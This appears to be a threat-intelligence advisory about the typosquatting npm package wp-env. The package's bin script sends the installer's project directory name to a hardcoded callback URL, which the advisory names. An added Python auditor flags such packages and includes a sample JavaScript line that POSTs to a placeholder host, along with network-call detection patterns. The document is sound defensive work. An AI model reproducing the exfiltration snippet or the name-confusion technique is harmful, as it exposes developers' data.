THREATPKG

Supply-chain threat intelligence

Incident detail

critical · npm · typosquatting · osv

Malicious code in wp-env (npm)

wp-env

Risk score

92

AI summary

Indexed incident for wp-env (npm).

Description

The package squats the wp-env CLI name, which users intending @wordpress/env commonly invoke as npx wp-env. The package ships only bin/run.js; the declared main (index.js) is absent from the tarball, so its sole execution surface is the bin script that fires when a developer runs npx wp-env. On execution, bin/run.js reads process.env.INIT_CWD, derives the basename of the installer's project directory, and POSTs it together with a timestamp and package metadata to a hardcoded callback URL, https://deepbounty.dd06-dev.fr/cb/dc43de99-70fc-4782-8668-bec6eee1975b. The package self-describes as a 'Security PoC for Bug Bounty'. In effect it is a name-confusion attack against @wordpress/env combined with concrete installer-side data exfiltration: the project directory basename is sent to an attacker-controlled host that uses a per-target callback path to identify successfully confused victims. This satisfies both the typosquat shape (a ≤2-character edit or namespace confusion relative to @wordpress/env's wp-env CLI) and a concrete exfil payload to an attacker-controlled destination.
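The three traits described above (an unscoped name colliding with a scoped package's bin command, a declared main missing from the tarball, and a bin script that reads INIT_CWD and calls a hardcoded URL) can be checked statically before a package is ever executed. The following is an added example, not code from ThreatPkg or from the package itself; the tarball contents, the callback placeholder URL and the KNOWN_SCOPED_BINS lookup table are constructed for illustration.

```python
import json
import re

# Constructed sample tarball modelled on the description above (not the real
# package): package.json plus the bin script; the declared main is absent.
SAMPLE_TARBALL = {
    "package/package.json": json.dumps({
        "name": "wp-env", "version": "1.0.0", "main": "index.js",
        "bin": {"wp-env": "bin/run.js"},
    }),
    "package/bin/run.js": (
        "const dir = require('path').basename(process.env.INIT_CWD || '');\n"
        "fetch('https://callback.invalid/cb/PLACEHOLDER', { method: 'POST' });\n"
    ),
}

# Bin commands exposed by well-known scoped packages (assumed lookup table).
KNOWN_SCOPED_BINS = {"wp-env": "@wordpress/env"}

URL_RE = re.compile(r"https?://[^\s'\"`]+")
NETWORK_RE = re.compile(r"\b(fetch|https?\.request|axios|XMLHttpRequest)\b")


def bin_entries(manifest):
    """Normalise package.json 'bin' (string or object) to {command: path}."""
    bins = manifest.get("bin", {})
    return {manifest["name"]: bins} if isinstance(bins, str) else dict(bins)


def audit_tarball(files):
    """Return findings for a tarball given as {path: text} with npm's 'package/' prefix."""
    manifest = json.loads(files["package/package.json"])
    findings = []
    name = manifest["name"]
    # Unscoped name identical to a scoped package's CLI command: namespace confusion.
    if not name.startswith("@") and name in KNOWN_SCOPED_BINS:
        findings.append(f"name collides with bin of {KNOWN_SCOPED_BINS[name]}")
    main = manifest.get("main", "index.js")
    if "package/" + main not in files:
        findings.append(f"declared main {main} missing from tarball")
    for cmd, rel in bin_entries(manifest).items():
        src = files.get("package/" + rel, "")
        if "INIT_CWD" in src:  # installer project directory, as in the incident
            findings.append(f"bin {cmd} reads INIT_CWD")
        urls = URL_RE.findall(src)
        if urls and NETWORK_RE.search(src):
            findings.append(f"bin {cmd} calls hardcoded URL {urls[0]}")
    return findings


if __name__ == "__main__":
    for f in audit_tarball(SAMPLE_TARBALL):
        print("FINDING:", f)
```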

Technical details

Affected versions

=1.0.0

Indicators

  • affected version=1.0.0 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg
